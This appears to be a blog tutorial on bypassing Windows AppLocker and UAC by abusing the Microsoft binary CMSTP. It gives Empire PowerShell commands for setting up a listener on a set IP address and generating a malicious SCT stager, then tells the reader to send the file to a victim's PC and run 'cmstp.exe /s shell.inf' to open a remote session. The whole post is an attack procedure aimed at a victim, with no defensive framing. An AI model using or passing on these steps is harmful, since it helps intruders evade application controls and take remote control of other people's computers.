By default, Applocker allows the executing of
binaries in the folder that is the major reason that it can be bypassed. It has
been found that such binaries can easily be used in order to bypass Applocker
along with UAC. One of such binary related to Microsoft is CMSTP. CMSTP
welcomes INF files and so exploitation through INF is possible. And so, we will
be learning how to perform such exploitation.
As we all know CMSTP accepts SCT
files and runs then without suspicion and therefore we will create a malicious
SCT file to reach our goal. We will use
Empire PowerShell for this. For a detailed guide on Empire PowerShell click here.
Launch the empire framework from the
terminal of Kali and then type the following commands to create your malware :
listeners
uselistener http
set Host 192.168.1.109
execute
Above commands will create a
listener for you, then type back to return from listener interface and as for
the creation of SCT file type :
usestager windows/launcher_sct
set Listener HTTP
execute
Running the above exploit will
create your SCT file. We will use the following script to execute our file in
PowerShell. In this script give the path of your SCT file and add the following
line as shown in the image.
Download this script from here:
Now, send the file to the victim’s
PC and run the following command in victims’ command prompt :
cmstp.exe /s shell.inf
As soon as you run the command, you
will have a session. Use the following command to access your session :
interact
This way, you can use CMSTP binary
to bypass applocker restrictions. CMSTP needs an INF file and by using it to
your advantage you can have access to victim’s PC.
0 comments:
Post a Comment